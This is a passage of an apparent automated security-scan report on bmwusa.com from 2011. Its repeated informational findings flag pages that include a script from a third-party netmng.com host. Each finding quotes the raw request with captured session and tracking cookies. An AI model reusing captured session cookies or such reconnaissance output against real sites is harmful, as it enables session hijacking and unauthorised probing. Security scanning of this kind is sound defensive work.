Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:25 GMT;path=/
Content-Length: 214974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.45. http://www.bmwusa.com/standard/content/vehicles/2011/1/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/1/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:20 GMT;path=/
Content-Length: 200292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.46. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328iconvertible/3seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:38 GMT;path=/
Content-Length: 202520


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.47. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328iconvertible/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:20 GMT;path=/
Content-Length: 214887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.48. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:51 GMT;path=/
Content-Length: 226399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.49. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:23 GMT;path=/
Content-Length: 216239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.50. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:39:58 GMT;path=/
Content-Length: 202158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.51. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328icoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328icoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:40 GMT;path=/
Content-Length: 212973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.52. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:07 GMT;path=/
Content-Length: 200604


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.53. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:59 GMT;path=/
Content-Length: 215188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.54. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:05 GMT;path=/
Content-Length: 201974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.55. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:45 GMT;path=/
Content-Length: 214690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.56. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:09 GMT;path=/
Content-Length: 225674


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.57. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:53 GMT;path=/
Content-Length: 215545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.58. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
